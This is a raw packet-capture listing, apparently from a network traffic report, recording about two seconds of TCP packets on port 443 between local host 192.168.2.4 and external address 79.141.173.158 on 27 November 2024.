Nov 27, 2024 16:29:37.305536032 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.305569887 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.459467888 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.459496021 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.459558964 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.459589958 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.459603071 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.459630966 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.466500998 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.466521978 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.466708899 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.466717005 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.466766119 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.473689079 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.473706007 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.473784924 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.473794937 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.473839998 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.480020046 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.480041981 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.480130911 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.480159044 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.480200052 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.486053944 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.486076117 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.486144066 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.486176014 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.486216068 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.492434025 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.492458105 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.492582083 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.492607117 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.492654085 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.499475956 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.499501944 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.499613047 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.499641895 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.499682903 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.505664110 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.505682945 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.505778074 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.505803108 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.505841017 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.661200047 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.661231041 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.661322117 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.661355972 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.661400080 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.667917967 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.667936087 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.668004990 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.668014050 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.668056011 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.673943043 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.673960924 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.674050093 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.674057961 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.674098969 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.680952072 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.680969000 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.681057930 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.681067944 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.681126118 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.689531088 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.689548016 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.689634085 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.689642906 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.689682961 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.696100950 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.696125984 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.696182013 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.696190119 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.696229935 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.696249962 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.702049971 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.702066898 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.702138901 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.702147961 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.702186108 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.707011938 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.707036018 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.707098007 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.707108021 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.707145929 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.862809896 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.862834930 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.862960100 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.862978935 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.863013029 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.863033056 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.869416952 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.869435072 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.869563103 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.869570971 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.869615078 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.876365900 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.876384020 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.876529932 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.876537085 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.876585007 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.882365942 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.882380962 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.882469893 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.882478952 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.882523060 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.889154911 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.889170885 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.889259100 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.889271975 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.889328003 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.895641088 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.895657063 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.895746946 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.895754099 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.895796061 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.902470112 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.902487040 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.902565002 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.902571917 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.902612925 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.909434080 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.909451962 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.909553051 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:37.909564972 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:37.909610987 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.063992023 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.064012051 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.064133883 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.064156055 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.064203978 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.070732117 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.070750952 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.070825100 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.070832968 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.070866108 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.077703953 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.077744961 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.077819109 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.077825069 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.077862978 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.083595037 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.083619118 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.083690882 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.083698034 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.083739996 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.090529919 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.090545893 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.090620995 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.090629101 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.090671062 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.097059011 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.097075939 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.097176075 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.097182989 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.097218037 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.103784084 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.103800058 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.103873968 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.103882074 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.103923082 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.110424042 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.110440969 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.110529900 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.110543013 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.110583067 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.265944004 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.265965939 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.266175032 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.266194105 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.266248941 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.272687912 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.272705078 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.272780895 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.272789955 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.272830963 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.279330969 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.279346943 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.279411077 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.279418945 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.279459000 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.285378933 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.285396099 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.285458088 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.285468102 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.285506010 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.292566061 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.292586088 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.292643070 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.292655945 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.292701960 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.298716068 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.298733950 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.298815012 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.298821926 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.298861027 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.305927992 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.305943966 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.306015015 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.306029081 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.306070089 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.312381983 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.312407017 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.312474966 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.312488079 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.312526941 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.467834949 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.467858076 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.468044996 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.468081951 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.468137026 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.473776102 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.473793983 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.473853111 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.473869085 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.473885059 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.473922014 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.480772018 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.480788946 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.480850935 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.480859041 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.480897903 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.487438917 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.487458944 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.487530947 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.487541914 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.487592936 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.494245052 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.494266033 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.494324923 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.494333982 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.494370937 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.500683069 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.500700951 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.500757933 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.500766993 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.500802040 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.506766081 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.506783962 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.506879091 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.506896019 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.506947994 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.514071941 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.514086962 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.514153957 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.514162064 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.514204025 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.668704987 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.668730974 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.668883085 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.668904066 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.668948889 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.676173925 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.676192045 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.676265955 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.676271915 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.676311970 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.683368921 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.683384895 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.683478117 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.683485985 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.683542967 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.689476013 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.689496040 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.689562082 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.689569950 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.689610004 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.695301056 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.695326090 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.695379972 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.695390940 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.695415020 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.695435047 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.702121019 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.702174902 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.702227116 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.702244043 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.702255011 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.702277899 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.708692074 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.708712101 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.708791018 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.708805084 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.708842039 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.715363026 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.715383053 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.715467930 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.715481997 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.715523005 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.870172977 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.870208979 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.870306015 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.870325089 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.870369911 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.877176046 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.877192020 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.877264977 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.877271891 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.877314091 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.883795977 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.883812904 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.883908033 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.883915901 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.883955956 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.889898062 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.889916897 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.890021086 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.890028000 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.890072107 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.897025108 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.897049904 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.897155046 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.897162914 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.897206068 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.903717995 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.903738022 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.903834105 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.903842926 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.903886080 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.910084963 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.910101891 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.910161018 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.910168886 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.910208941 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.916642904 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.916660070 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.916766882 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:38.916774988 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:38.916812897 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.130049944 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.130063057 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.130099058 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.130127907 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.130151033 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.130163908 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.130203009 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.136322021 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.136343002 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.136389017 CET	49730	443	192.168.2.4	79.141.173.158
Nov 27, 2024 16:29:39.136395931 CET	443	49730	79.141.173.158	192.168.2.4
Nov 27, 2024 16:29:39.136425972 CET	49730	443	192.168.2.4	79.141.173.158
